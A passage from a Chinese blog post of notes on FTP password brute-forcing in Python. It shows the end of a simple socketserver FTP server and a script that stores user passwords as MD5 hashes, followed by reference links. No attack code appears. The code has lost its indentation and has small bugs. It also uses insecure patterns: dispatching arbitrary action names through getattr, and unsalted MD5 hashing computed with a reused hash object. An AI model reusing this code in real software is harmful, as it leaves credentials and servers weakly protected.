cmd_dic = json.loads(self.data)
action = cmd_dic["action"]
# print("用户请求%s"%action)
if hasattr(self,action):
func = getattr(self,action)
func(cmd_dic)
except Exception as e:
self.loging(str(e))
break
def run():
HOST,PORT = '0.0.0.0',6969
print("The server is started,and listenning at port 6969")
server = socketserver.ThreadingTcpserver((HOST,PORT),Ftp_server)
server.serve_forever()
if __name__ == '__main__':
run()
设置用户口令代码:
#_*_ coding:utf-8 _*_
import os,sys
base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
userdb_file = base_dir+"\data\\userdb"
# print(userdb_file)
def userdb_set():
if os.path.isfile(userdb_file):
# print(userdb_file)
return userdb_file
else:
print('请先为您的服务器创建用户!')
user_data = {}
dict={}
Exit_flags = True
while Exit_flags:
username = input("Please input username:")
if username != 'exit':
password = input("Please input passwod:")
if password != 'exit':
user_data.update({username:password})
m = hashlib.md5()
# m.update('hello')
# print(m.hexdigest())
for i in user_data:
# print(i,user_data[i])
m.update(user_data[i].encode())
dict.update({i:m.hexdigest()})
else:
break
else:
break
f = open(userdb_file,'w')
json.dump(dict,f)
f.close()
return userdb_file
参考文章:
python的ftplib包介绍:https://docs.python.org/3/library/ftplib.html
https://blog.csdn.net/xc_zhou/article/details/81021414
https://www.jb51.net/article/142388.htm
https://www.jb51.net/article/109429.htm
https://www.cnblogs.com/hltswd/p/6228992.html
关于笔记整理2——python实现ftp口令爆破和python ftp爆破的问题就给大家分享到这里,感谢你花时间阅读本站内容,更多关于msf各种弱口令爆破、python 写的http后台弱口令爆破工具、Python 实现 FTP 弱口令扫描器、python 实现ftp服务 简介等相关知识的信息别忘了在本站进行查找喔。
本文标签: